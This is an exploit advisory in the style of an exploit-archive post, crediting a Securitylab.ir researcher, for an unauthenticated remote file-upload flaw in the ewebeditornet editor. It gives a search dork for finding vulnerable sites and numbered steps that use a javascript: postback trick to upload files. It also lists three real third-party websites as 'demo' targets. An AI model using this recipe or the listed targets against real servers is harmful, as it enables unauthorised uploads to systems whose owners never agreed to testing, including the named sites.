######################### Securitylab.ir ########################
# Application Info:
# Name: ewebeditornet
# http://www.ewebeditor.com
#################################################################
# Bug found by: Pouya Daneshmand
# Contact: Pouya[AT]Securitylab[Dot]ir , whh_iran@yahoo.com
# Website: http://securitylab.ir
#################################################################
# Vulnerability Info:
# Type: Remote File Upload without Authentication
# Risk: Medium
# Dork: inurl:/ewebeditornet/
#===========================================================
# 1.find page
# http://site.com/[Path]/ewebEditorNet/upload.aspx
#
# 2.Choose File (file allowed:txt,html,jpg,png,doc,swf,gif,bmp,xls,xml,zip)
#
# 3.Put this Code instead URL: javascript:lbtnUpload.click()
#
# 4.Press Enter
#
# 5.viewing source page :
# <a id="lbtnUpload" href="javascript:__doPostBack('lbtnUpload','')">
# </a><script language='javascript'>parent.UploadSaved('[Filenumber.txt]');history.back();</script>
#
# 6.file uploaded to
# http://site.com/[Path]/ewebEditorNet/UploadFile/[Filenumber.txt]
#===========================================================
#################################################################
# demo:
# http://www.zgcxjs.com/admin/eWebEditorNet/upload.aspx
# http://www.zgxwdc.com/admin/eWebEditorNet/Upload.aspx
# http://www.yljfzx.com/admin/eWebEditorNet/upload.aspx
#################################################################
# Securitylab Security Research Team
###################################################################